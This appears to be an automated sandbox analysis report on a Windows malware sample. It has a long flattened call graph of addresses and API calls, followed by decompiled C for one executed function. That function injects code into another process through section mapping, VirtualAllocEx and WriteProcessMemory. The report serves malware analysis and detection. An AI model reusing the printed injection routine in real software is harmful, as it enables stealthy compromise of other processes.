11802->11803 12673 53666c7 memset 11803->12673 11806 5368baf 2 API calls 11807 5370a9c 11806->11807 11808 5370b15 11807->11808 12685 536a96c 11807->12685 11808->11466 11812 5370ac7 11812->11808 11813 536109a 2 API calls 11812->11813 11814 5370ad9 11813->11814 11815 5369e51 2 API calls 11814->11815 11816 5370ae8 11815->11816 11817 536b5fb 2 API calls 11816->11817 11818 5370afb 11817->11818 11819 5370b09 11818->11819 12689 536add4 11818->12689 11821 5368bf4 2 API calls 11819->11821 11821->11808 11823 5366004 11822->11823 12702 5365c22 11823->12702 11865 5368bde RtlAllocateHeap 11826->11865 11828 536a65d 11829 5366126 11828->11829 11866 536c43a 11828->11866 11829->11448 11829->11449 11829->11741 11832 5369dd8 2 API calls 11833 536a69d 11832->11833 11834 536a7db 11833->11834 11838 536a6c9 11833->11838 11835 536a82c 11834->11835 11836 536a7ed 11834->11836 11837 5369a07 2 API calls 11835->11837 11839 5369a07 2 API calls 11836->11839 11860 536a7d7 11836->11860 11837->11860 11838->11860 11876 5369a07 11838->11876 11839->11860 11840 5368b9c 2 API calls 11842 536a84c 11840->11842 11843 5368bf4 2 API calls 11842->11843 11856 536a8a7 11842->11856 11844 536a8e2 11843->11844 11845 5368d6d memset 11844->11845 11845->11856 11847 536a791 11852 5369a07 2 API calls 11847->11852 11848 5369df2 2 API calls 11849 536a72f 11848->11849 11851 5369a5a 2 API calls 11849->11851 11850 5368bf4 2 API calls 11850->11829 11853 536a741 11851->11853 11854 536a7b8 11852->11854 11855 5368baf 2 API calls 11853->11855 11859 5368bf4 2 API calls 11854->11859 11857 536a74f 11855->11857 11856->11850 11856->11856 11882 5369930 11857->11882 11859->11860 11860->11840 11862 5368bf4 2 API calls 11863 536a786 11862->11863 11864 5368bf4 2 API calls 11863->11864 11864->11847 11865->11828 11867 536c453 11866->11867 11868 5373674 2 API calls 11867->11868 11869 536c463 11868->11869 11870 5369dd8 2 API calls 11869->11870 11872 536c472 11870->11872 11871 536c4ae 11873 5368b9c 2 API calls 11871->11873 11872->11871 11874 5373674 2 API calls 11872->11874 11875 536a67e 11873->11875 11874->11872 11875->11832 11877 5369a19 11876->11877 11888 5368bde RtlAllocateHeap 11877->11888 11879 5369a36 11880 5369a53 11879->11880 11881 5369a42 lstrcatA 11879->11881 11880->11842 11880->11847 11880->11848 11881->11879 11883 5369966 11882->11883 11884 5369939 11882->11884 11883->11862 11889 5368bde RtlAllocateHeap 11884->11889 11886 536994b 11886->11883 11887 5369953 MultiByteToWideChar 11886->11887 11887->11883 11888->11879 11889->11886 11890->11743 11892 536b3d8 11891->11892 11893 536b3df 11891->11893 11892->11747 11897 5370b23 11892->11897 11893->11892 11894 536b409 11893->11894 11922 5368bde RtlAllocateHeap 11893->11922 11894->11892 11896 5368bf4 2 API calls 11894->11896 11896->11892 11923 5368bde RtlAllocateHeap 11897->11923 11899 5370b36 11900 536109a 2 API calls 11899->11900 11901 5370c28 11899->11901 11905 5370c73 11899->11905 11902 5370b6f 11900->11902 11903 5368bf4 2 API calls 11901->11903 11904 5369df2 2 API calls 11902->11904 11903->11905 11906 5370b93 11904->11906 11918 536fba1 11905->11918 11907 5369a5a 2 API calls 11906->11907 11908 5370bb1 11907->11908 11909 536b3c7 3 API calls 11908->11909 11910 5370bbe 11909->11910 11911 5368baf 2 API calls 11910->11911 11912 5370bca 11911->11912 11913 5368baf 2 API calls 11912->11913 11915 5370bd3 11913->11915 11914 5368bf4 2 API calls 11916 5370c1d 11914->11916 11915->11914 11917 5368bf4 2 API calls 11916->11917 11917->11901 11919 536fbc5 11918->11919 11924 5370320 11919->11924 11922->11894 11923->11899 11926 5370339 11924->11926 11925 537035a lstrlenW 11927 536fbd7 11925->11927 11926->11925 11926->11926 11927->11752 11929 536b557 7 API calls 11928->11929 11930 5365cff 11929->11930 11930->11757 11930->11758 11932 536a9db 11931->11932 11935 536ab20 11932->11935 11936 536ab42 11935->11936 11949 536a5d3 11936->11949 11938 5366279 11938->11763 11938->11764 11939 536ab4c 11939->11938 11952 536cd27 11939->11952 11941 536ac19 11942 5368bf4 2 API calls 11941->11942 11942->11938 11943 536ab80 11943->11941 11944 5370320 lstrlenW 11943->11944 11945 536abd1 11944->11945 11947 5368c43 RtlAllocateHeap 11945->11947 11948 536abf4 11945->11948 11946 5368bf4 2 API calls 11946->11941 11947->11948 11948->11946 11956 5368bde RtlAllocateHeap 11949->11956 11951 536a5df 11951->11939 11953 536cd4d 11952->11953 11955 536cd51 11953->11955 11957 5368bde RtlAllocateHeap 11953->11957 11955->11943 11956->11951 11957->11955 11959 536b0e4 11958->11959 11960 536b115 GetLastError 11959->11960 11961 536b10a GetLastError 11959->11961 11962 536b0ee 11959->11962 11960->11962 11961->11962 11962->11774 11979 536aadc 11963->11979 11966 536bfdb SetFileAttributesW 11967 5368d6d memset 11966->11967 11968 536c008 11967->11968 11969 536c029 11968->11969 11970 5373674 2 API calls 11968->11970 11969->11782 11971 536c045 11970->11971 11972 5369e51 2 API calls 11971->11972 11973 536c056 11972->11973 11974 5369a5a 2 API calls 11973->11974 11975 536c067 11974->11975 11975->11969 12000 536bf08 11975->12000 11978 5368bf4 2 API calls 11978->11969 11980 536aaec 11979->11980 11983 536ac4b 11980->11983 11984 53660fe 11983->11984 11985 536ac68 11983->11985 11984->11782 11984->11966 11985->11984 11986 5373674 2 API calls 11985->11986 11987 536acac 11986->11987 11999 5368bde RtlAllocateHeap 11987->11999 11989 536acc0 11989->11984 11990 537351a 2 API calls 11989->11990 11991 536ad02 11990->11991 11992 5370320 lstrlenW 11991->11992 11993 536ad43 11992->11993 11994 536a5d3 RtlAllocateHeap 11993->11994 11996 536ad4f 11994->11996 11995 5368bf4 2 API calls 11995->11984 11997 5368bf4 2 API calls 11996->11997 11998 536adb9 11996->11998 11997->11998 11998->11995 11999->11989 12001 536bf2b 12000->12001 12002 536bf33 memset 12001->12002 12011 536bfa2 12001->12011 12003 5369df2 2 API calls 12002->12003 12004 536bf4f 12003->12004 12005 5373674 2 API calls 12004->12005 12006 536bf6b 12005->12006 12007 5369e51 2 API calls 12006->12007 12008 536bf81 12007->12008 12009 5368baf 2 API calls 12008->12009 12010 536bf8a MoveFileW 12009->12010 12010->12011 12011->11978 12012->11790 12014 5361080 2 API calls 12013->12014 12015 5362bfd 12014->12015 12106 536b1a4 12015->12106 12018 5368b9c 2 API calls 12019 5362c20 12018->12019 12020 5361080 2 API calls 12019->12020 12027 5362c53 12019->12027 12021 5362c2e 12020->12021 12116 536af9c 12021->12116 12024 5368b9c 2 API calls 12025 5362c47 12024->12025 12026 5368bf4 2 API calls 12025->12026 12026->12027 12027->11794 12224 536f14a 12028->12224 12033 536f05c 8 API calls 12034 5365401 12033->12034 12035 5369df2 2 API calls 12034->12035 12036 5365412 12035->12036 12037 5369a5a 2 API calls 12036->12037 12038 536542a 12037->12038 12039 5368baf 2 API calls 12038->12039 12040 536543d 12039->12040 12041 5365453 12040->12041 12244 536afb9 12040->12244 12043 5368bf4 2 API calls 12041->12043 12044 5365464 12043->12044 12250 53650b3 memset 12044->12250 12046 5365481 12047 5368d6d memset 12046->12047 12092 5365776 12046->12092 12048 53654bd 12047->12048 12310 536f326 12048->12310 12049 5369df2 2 API calls 12050 5365782 12049->12050 12052 5369a5a 2 API calls 12050->12052 12056 536579a 12052->12056 12053 53657ca 12055 5368baf 2 API calls 12053->12055 12058 53657d6 lstrcpynW lstrcpynW 12055->12058 12056->12053 12060 5368bf4 2 API calls 12056->12060 12057 5365537 12064 5365540 12057->12064 12057->12092 12059 536581b 12058->12059 12061 5368bf4 2 API calls 12059->12061 12060->12053 12062 5365608 12062->12092 12323 5370d7e 12062->12323 12315 5368bde RtlAllocateHeap 12064->12315 12070 53655ff 12070->11795 12092->12049 12099 536afe5 12098->12099 12105 53660b0 12098->12105 12100 5368bf4 2 API calls 12099->12100 12104 536b00a 12099->12104 12100->12099 12101 5368bf4 2 API calls 12102 536b015 12101->12102 12103 5368bf4 2 API calls 12102->12103 12103->12105 12104->12101 12105->11799 12107 5369930 2 API calls 12106->12107 12108 536b1c4 12107->12108 12109 5373674 2 API calls 12108->12109 12111 536b211 12108->12111 12110 536b1e3 FindResourceW 12109->12110 12110->12108 12110->12111 12112 5368bf4 2 API calls 12111->12112 12113 536b21c 12112->12113 12114 5368c43 RtlAllocateHeap 12113->12114 12115 5362c10 12113->12115 12114->12115 12115->12018 12121 5368f2e 12116->12121 12119 5362c3c 12119->12024 12122 5368f3d 12121->12122 12123 5368f79 12121->12123 12139 5368bde RtlAllocateHeap 12122->12139 12123->12119 12129 536aee1 12123->12129 12125 5368f47 12125->12123 12140 5368e33 12125->12140 12128 5368bf4 2 API calls 12128->12123 12183 53690ae 12129->12183 12133 536aefb 12134 536af95 12133->12134 12135 536af8d 12133->12135 12137 5368c72 3 API calls 12133->12137 12189 5369880 12133->12189 12134->12119 12193 53692de 12135->12193 12137->12133 12139->12125 12154 5368bde RtlAllocateHeap 12140->12154 12142 5368e48 12145 5368e70 12142->12145 12153 5368e55 12142->12153 12155 5369384 12142->12155 12143 5368ef4 12146 5368bf4 2 API calls 12143->12146 12143->12153 12145->12143 12147 5368ebe 12145->12147 12148 5369384 lstrlenW 12145->12148 12146->12153 12147->12143 12147->12153 12159 536fc3a 12147->12159 12148->12147 12151 5368f0e 12152 5368bf4 2 API calls 12151->12152 12152->12153 12153->12123 12153->12128 12154->12142 12156 53693a4 12155->12156 12157 5370320 lstrlenW 12156->12157 12158 53693c8 12157->12158 12158->12145 12174 5368bde RtlAllocateHeap 12159->12174 12161 536fc5e 12171 536fdcd 12161->12171 12175 5368bde RtlAllocateHeap 12161->12175 12162 5368bf4 2 API calls 12164 536fdf3 12162->12164 12166 5368bf4 2 API calls 12164->12166 12165 536fc7e 12165->12171 12176 5368bde RtlAllocateHeap 12165->12176 12167 536fe01 12166->12167 12169 5368eed 12167->12169 12170 5368bf4 2 API calls 12167->12170 12169->12143 12169->12151 12170->12169 12171->12162 12172 536fc92 12172->12171 12177 5368c72 12172->12177 12174->12161 12175->12165 12176->12172 12182 5368bde RtlAllocateHeap 12177->12182 12179 5368caf 12179->12172 12180 5368c87 12180->12179 12181 5368bf4 2 API calls 12180->12181 12181->12179 12182->12180 12186 53690d1 12183->12186 12184 5368bde RtlAllocateHeap 12184->12186 12185 5369205 12188 5368bde RtlAllocateHeap 12185->12188 12186->12184 12186->12185 12187 5368bf4 2 API calls 12186->12187 12187->12186 12188->12133 12190 536988b 12189->12190 12192 53698a1 12189->12192 12205 5368bde RtlAllocateHeap 12190->12205 12192->12133 12194 53692ed 12193->12194 12204 5369375 12193->12204 12195 5369327 12194->12195 12198 5368bf4 2 API calls 12194->12198 12194->12204 12196 5369337 12195->12196 12206 5369405 12195->12206 12197 5369352 12196->12197 12200 5368bf4 2 API calls 12196->12200 12201 5369368 12197->12201 12202 5368bf4 2 API calls 12197->12202 12198->12194 12200->12197 12203 5368bf4 2 API calls 12201->12203 12202->12201 12203->12204 12204->12134 12205->12192 12218 5368bde RtlAllocateHeap 12206->12218 12208 5369448 12208->12196 12209 536943e 12209->12208 12210 5369471 12209->12210 12212 53694ef 12209->12212 12219 5368dbb 12210->12219 12213 5370320 lstrlenW 12212->12213 12216 53694e7 12213->12216 12214 536947d 12215 5370320 lstrlenW 12214->12215 12215->12216 12217 5368bf4 2 API calls 12216->12217 12217->12208 12218->12209 12220 5373674 2 API calls 12219->12220 12223 5368dd4 12220->12223 12221 5368e01 12221->12214 12222 5373674 2 API calls 12222->12223 12223->12221 12223->12222 12225 536f160 12224->12225 12226 53653da 12224->12226 12227 5369dd8 2 API calls 12225->12227 12226->12070 12237 5365021 12226->12237 12228 536f16c 12227->12228 12229 5369dd8 2 API calls 12228->12229 12230 536f17b 12229->12230 12230->12226 12231 536f188 GetModuleHandleA 12230->12231 12232 536f195 GetModuleHandleA 12231->12232 12233 536f19c 12231->12233 12232->12233 12234 5368b9c 2 API calls 12233->12234 12235 536f1a7 12234->12235 12236 5368b9c 2 API calls 12235->12236 12236->12226 12238 536c6ce 9 API calls 12237->12238 12239 5365031 12238->12239 12240 536b557 7 API calls 12239->12240 12241 536503c 12240->12241 12349 536b096 12241->12349 12243 5365047 12243->12033 12243->12070 12354 5368f8d 12244->12354 12246 536afc5 12247 536afcb 12246->12247 12248 536aee1 6 API calls 12246->12248 12247->12041 12249 536afd4 12248->12249 12249->12041 12251 53650ee 12250->12251 12254 5365123 12251->12254 12376 5363097 12251->12376 12252 536c6ce 9 API calls 12255 5365133 12252->12255 12254->12252 12259 5365188 12254->12259 12256 536c4c1 6 API calls 12255->12256 12257 5365143 12256->12257 12392 5365072 12257->12392 12259->12046 12563 536f236 12310->12563 12313 536f236 39 API calls 12314 53654f5 12313->12314 12314->12057 12314->12062 12314->12092 12324 5370d91 12323->12324 12350 536b0aa 12349->12350 12351 536b0b0 GetLastError 12350->12351 12352 536b0ba GetLastError 12350->12352 12353 536b0c7 12351->12353 12352->12353 12353->12243 12374 5368bde RtlAllocateHeap 12354->12374 12356 5368fae 12357 5368fbf lstrcpynW 12356->12357 12364 5368fb8 12356->12364 12358 5369032 12357->12358 12359 5368fe2 12357->12359 12375 5368bde RtlAllocateHeap 12358->12375 12361 536b3c7 3 API calls 12359->12361 12363 5368fee 12361->12363 12362 536903d 12362->12364 12365 5369057 12362->12365 12367 5368bf4 2 API calls 12362->12367 12363->12365 12366 5368e33 4 API calls 12363->12366 12364->12246 12369 536907f 12365->12369 12370 5368bf4 2 API calls 12365->12370 12368 5369008 12366->12368 12367->12365 12368->12362 12372 536900e 12368->12372 12371 5368bf4 2 API calls 12369->12371 12370->12369 12371->12364 12373 5368bf4 2 API calls 12372->12373 12373->12364 12374->12356 12375->12362 12378 53630b3 12376->12378 12377 536314b 12377->12254 12378->12377 12379 536109a 2 API calls 12378->12379 12380 53630c6 12379->12380 12381 5369a5a 2 API calls 12380->12381 12382 53630d8 12381->12382 12383 5368baf 2 API calls 12382->12383 12384 53630e3 12383->12384 12385 536109a 2 API calls 12384->12385 12386 53630ea 12385->12386 12496 536cdc3 12386->12496 12393 5369930 2 API calls 12392->12393 12394 536507d 12393->12394 12395 5369df2 2 API calls 12394->12395 12396 5365089 12395->12396 12397 5369a5a 2 API calls 12396->12397 12398 5365095 12397->12398 12399 5368baf 2 API calls 12398->12399 12497 536cdf0 12496->12497 12500 53630f8 12497->12500 12502 5368bde RtlAllocateHeap 12497->12502 12565 536f26a 12563->12565 12566 536f26e 12565->12566 12568 5368bde RtlAllocateHeap 12565->12568 12569 5364fa3 12565->12569 12566->12313 12566->12314 12568->12565 12570 5364fc5 12569->12570 12571 5365012 12570->12571 12572 53650b3 34 API calls 12570->12572 12571->12565 12573 5364fe5 12572->12573 12573->12571 12577 5364f63 12573->12577 12695 5368bde RtlAllocateHeap 12673->12695 12675 5366702 12676 5366873 12675->12676 12696 5368bde RtlAllocateHeap 12675->12696 12676->11806 12678 5366782 12680 5368bf4 2 API calls 12678->12680 12679 536671c 12679->12676 12679->12678 12683 5368d6d memset 12679->12683 12684 536bfdb 11 API calls 12679->12684 12681 5366865 12680->12681 12682 5368bf4 2 API calls 12681->12682 12682->12676 12683->12679 12684->12679 12697 536a97b 12685->12697 12688 5368bde RtlAllocateHeap 12688->11812 12690 536ade0 12689->12690 12691 536a5d3 RtlAllocateHeap 12690->12691 12692 536ae08 12691->12692 12693 5368bf4 2 API calls 12692->12693 12694 536ae6d 12692->12694 12693->12694 12694->11819 12695->12675 12696->12679 12698 536ab20 4 API calls 12697->12698 12699 536a99a 12698->12699 12700 536a978 12699->12700 12701 5368bf4 2 API calls 12699->12701 12700->11808 12700->12688 12701->12700 12703 536a96c 4 API calls 12702->12703 12704 5365c2f 12703->12704 12737 5365c65 12704->12737 12738 536b297 12704->12738 12707 536aa65 6 API calls 12708 5365c55 12707->12708 12743 536f53a 12708->12743 12716 5365c7f 12771 53614f2 CreateMutexW 12716->12771 12718 5365c86 12786 53634cc 12718->12786 12737->11456 12739 536a065 GetSystemTimeAsFileTime 12738->12739 12740 536b2a2 12739->12740 12741 536aa36 6 API calls 12740->12741 12742 5365c43 12741->12742 12742->12707 12744 536f05c 8 API calls 12743->12744 12745 536f54c 12744->12745 12746 536f05c 8 API calls 12745->12746 12747 536f565 12746->12747 12845 536f4c9 12747->12845 12749 5365c5c 12750 5365baa 12749->12750 12751 536b557 7 API calls 12750->12751 12752 5365bc6 12751->12752 12752->12737 12753 536a108 12752->12753 12754 536a119 12753->12754 12755 5365c6f 12754->12755 12859 5368bde RtlAllocateHeap 12754->12859 12757 536a205 12755->12757 12759 536a223 12757->12759 12758 536a27b 12761 536a28c 12758->12761 12866 5368bde RtlAllocateHeap 12758->12866 12759->12758 12767 536a227 12759->12767 12860 536a15b 12759->12860 12762 536b096 2 API calls 12761->12762 12761->12767 12764 536a2f1 12762->12764 12765 536a367 SetThreadPriority 12764->12765 12766 536a32c 12764->12766 12765->12767 12768 536a350 12766->12768 12769 5368bf4 2 API calls 12766->12769 12767->12716 12770 5368d6d memset 12768->12770 12769->12768 12770->12767 12772 536150b CreateMutexW 12771->12772 12782 5361556 12771->12782 12773 536151d 12772->12773 12772->12782 12774 5361080 2 API calls 12773->12774 12775 5361525 12774->12775 12776 5369880 RtlAllocateHeap 12775->12776 12775->12782 12777 5361535 12776->12777 12778 5368b9c 2 API calls 12777->12778 12779 5361542 12778->12779 12867 5368bde RtlAllocateHeap 12779->12867 12781 536154c 12781->12782 12868 5368bde RtlAllocateHeap 12781->12868 12782->12718 12784 536156d 12784->12782 12869 53673f1 12784->12869 12787 536a205 6 API calls 12786->12787 12788 53634dc 12787->12788 12789 5363501 12788->12789 12790 536350f 12789->12790 12792 5363514 12789->12792 12873 536c987 12790->12873 12793 53636aa 12792->12793 12794 536d11f 8 API calls 12793->12794 12795 53636c5 12794->12795 12796 53636ce 12795->12796 12880 5368bde RtlAllocateHeap 12795->12880 12806 5362e6b 12796->12806 12798 53636e2 12805 53636ec 12798->12805 12881 536cd02 12798->12881 12800 5368bf4 2 API calls 12800->12796 12805->12800 12807 536a96c 4 API calls 12806->12807 12808 5362e81 12807->12808 12894 5362db5 12808->12894 12811 5362db5 3 API calls 12812 5362ea9 12811->12812 12898 5362f4a 12812->12898 12846 536f4d7 12845->12846 12847 536f513 12845->12847 12858 5368bde RtlAllocateHeap 12846->12858 12849 5369dd8 2 API calls 12847->12849 12850 536f51d 12849->12850 12852 5369880 RtlAllocateHeap 12850->12852 12851 536f4e8 12855 536f536 12851->12855 12856 5368bf4 2 API calls 12851->12856 12853 536f529 12852->12853 12854 5368b9c 2 API calls 12853->12854 12854->12855 12855->12749 12857 536f50c 12856->12857 12857->12749 12858->12851 12859->12755 12861 536a165 12860->12861 12862 536a18a 12861->12862 12863 5368bf4 2 API calls 12861->12863 12865 536a1a0 12861->12865 12864 5368d6d memset 12862->12864 12863->12862 12864->12865 12865->12759 12866->12761 12867->12781 12868->12784 12870 53673f6 12869->12870 12871 536f05c 8 API calls 12870->12871 12872 5367408 12871->12872 12872->12782 12874 536c99e 12873->12874 12875 5369df2 2 API calls 12874->12875 12879 536c9bd 12874->12879 12876 536c9cc lstrcmpiW 12875->12876 12877 536c9e2 12876->12877 12878 5368baf 2 API calls 12877->12878 12878->12879 12879->12792 12880->12798 12889 536cb77 12881->12889 12884 536cae1 12885 5369df2 2 API calls 12884->12885 12886 536cb07 12885->12886 12887 5368baf 2 API calls 12886->12887 12890 5368d6d memset 12889->12890 12891 536cbae 12890->12891 12892 53636f8 12891->12892 12893 536cc68 LocalAlloc 12891->12893 12892->12805 12892->12884 12893->12892 12895 5362dbf 12894->12895 12896 5362dd6 12894->12896 12897 5368c72 3 API calls 12895->12897 12896->12811 12897->12896 12909 536a9b8 12898->12909 12916 536a9c2 12909->12916 13038->11469 13039->11472

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 0536D447 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 223nativeregistrymemoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                        			E0536D447(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				void* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				short _t98;
				intOrPtr _t105;
				long _t107;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				void* _t138;
				void* _t147;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t158;
				void* _t163;
				void* _t165;

				_t81 =  *0x537f81c; // 0x546fbe8
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E0536F0DE(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x537f918; // 0x546f9f0
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x537f818; // 0x546f8b0
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
					}
					if(_v20 != 0) {
						NtClose(_v20);
					}
					return _v8;
				}
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x537ce44; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t105 =  *0x537f818; // 0x546f8b0
				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
				_t158 = _v12;
				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
					goto L15;
				} else {
					_t154 = E05368C43( *0x537f81c, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E05368BF4( &_v36, 0x1ac4);
					_t119 =  *0x537f81c; // 0x546fbe8
					_t155 =  *0x537f830; // 0x5360000
					_v36 = _t119;
					 *0x537f830 = _v8;
					 *0x537f81c = _t163;
					E05368CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E0536D3C6(_v16, _v8, _v44);
					_t124 = E0536A43D("quatr");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 = _t138 + 1;
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x537f830 = _t155;
						 *0x537f81c = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}






































                                                                                                                                                                        0x0536d44d
                                                                                                                                                                        0x0536d453
                                                                                                                                                                        0x0536d455
                                                                                                                                                                        0x0536d459
                                                                                                                                                                        0x0536d45b
                                                                                                                                                                        0x0536d45e
                                                                                                                                                                        0x0536d461
                                                                                                                                                                        0x0536d464
                                                                                                                                                                        0x0536d467
                                                                                                                                                                        0x0536d46a
                                                                                                                                                                        0x0536d475
                                                                                                                                                                        0x0536d478
                                                                                                                                                                        0x0536d47f
                                                                                                                                                                        0x0536d47f
                                                                                                                                                                        0x0536d484
                                                                                                                                                                        0x0536d487
                                                                                                                                                                        0x0536d489
                                                                                                                                                                        0x0536d48c
                                                                                                                                                                        0x0536d495
                                                                                                                                                                        0x0536d68e
                                                                                                                                                                        0x0536d68e
                                                                                                                                                                        0x0536d691
                                                                                                                                                                        0x0536d694
                                                                                                                                                                        0x0536d699
                                                                                                                                                                        0x0536d69f
                                                                                                                                                                        0x0536d6a2
                                                                                                                                                                        0x0536d6a2
                                                                                                                                                                        0x0536d6a5
                                                                                                                                                                        0x0536d6a9
                                                                                                                                                                        0x0536d6ab
                                                                                                                                                                        0x0536d6c0
                                                                                                                                                                        0x0536d6c0
                                                                                                                                                                        0x0536d6ca
                                                                                                                                                                        0x0536d6d4
                                                                                                                                                                        0x0536d6d4
                                                                                                                                                                        0x0536d6db
                                                                                                                                                                        0x0536d6db
                                                                                                                                                                        0x0536d4a4
                                                                                                                                                                        0x0536d4be
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536d4c4
                                                                                                                                                                        0x0536d4cc
                                                                                                                                                                        0x0536d4d4
                                                                                                                                                                        0x0536d4da
                                                                                                                                                                        0x0536d4e1
                                                                                                                                                                        0x0536d4e9
                                                                                                                                                                        0x0536d4ea
                                                                                                                                                                        0x0536d4f1
                                                                                                                                                                        0x0536d4f4
                                                                                                                                                                        0x0536d4f5
                                                                                                                                                                        0x0536d4fc
                                                                                                                                                                        0x0536d4ff
                                                                                                                                                                        0x0536d506
                                                                                                                                                                        0x0536d507
                                                                                                                                                                        0x0536d50a
                                                                                                                                                                        0x0536d516
                                                                                                                                                                        0x0536d538
                                                                                                                                                                        0x0536d540
                                                                                                                                                                        0x0536d543
                                                                                                                                                                        0x0536d54e
                                                                                                                                                                        0x0536d54e
                                                                                                                                                                        0x0536d540
                                                                                                                                                                        0x0536d56a
                                                                                                                                                                        0x0536d579
                                                                                                                                                                        0x0536d57c
                                                                                                                                                                        0x0536d581
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536d5ab
                                                                                                                                                                        0x0536d5bb
                                                                                                                                                                        0x0536d5bd
                                                                                                                                                                        0x0536d5c4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536d5d9
                                                                                                                                                                        0x0536d5ec
                                                                                                                                                                        0x0536d600
                                                                                                                                                                        0x0536d60c
                                                                                                                                                                        0x0536d611
                                                                                                                                                                        0x0536d616
                                                                                                                                                                        0x0536d61c
                                                                                                                                                                        0x0536d622
                                                                                                                                                                        0x0536d62a
                                                                                                                                                                        0x0536d63a
                                                                                                                                                                        0x0536d646
                                                                                                                                                                        0x0536d650
                                                                                                                                                                        0x0536d658
                                                                                                                                                                        0x0536d65d
                                                                                                                                                                        0x0536d660
                                                                                                                                                                        0x0536d668
                                                                                                                                                                        0x0536d668
                                                                                                                                                                        0x0536d668
                                                                                                                                                                        0x0536d66b
                                                                                                                                                                        0x0536d66f
                                                                                                                                                                        0x0536d670
                                                                                                                                                                        0x0536d674
                                                                                                                                                                        0x0536d678
                                                                                                                                                                        0x0536d681
                                                                                                                                                                        0x0536d687
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536d687
                                                                                                                                                                        0x0536d662
                                                                                                                                                                        0x0536d666
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536d666

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtCreateSection.NTDLL(0536D982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0536D4B9
                                                                                                                                                                        • RegisterClassExA.USER32(?), ref: 0536D50D
                                                                                                                                                                        • CreateWindowExA.USER32 ref: 0536D538
                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 0536D543
                                                                                                                                                                        • UnregisterClassA.USER32 ref: 0536D54E
                                                                                                                                                                        • NtMapViewOfSection.NTDLL(0536D982,00000000), ref: 0536D579
                                                                                                                                                                        • NtMapViewOfSection.NTDLL(0536D982,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0536D5A0
                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 0536D5E6
                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 0536D600
                                                                                                                                                                          • Part of subcall function 05368BF4: HeapFree.KERNEL32(00000000,00000000), ref: 05368C3A
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,053661C5), ref: 0536D678
                                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(00000000), ref: 0536D6C0
                                                                                                                                                                        • NtClose.NTDLL(00000000), ref: 0536D6D4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
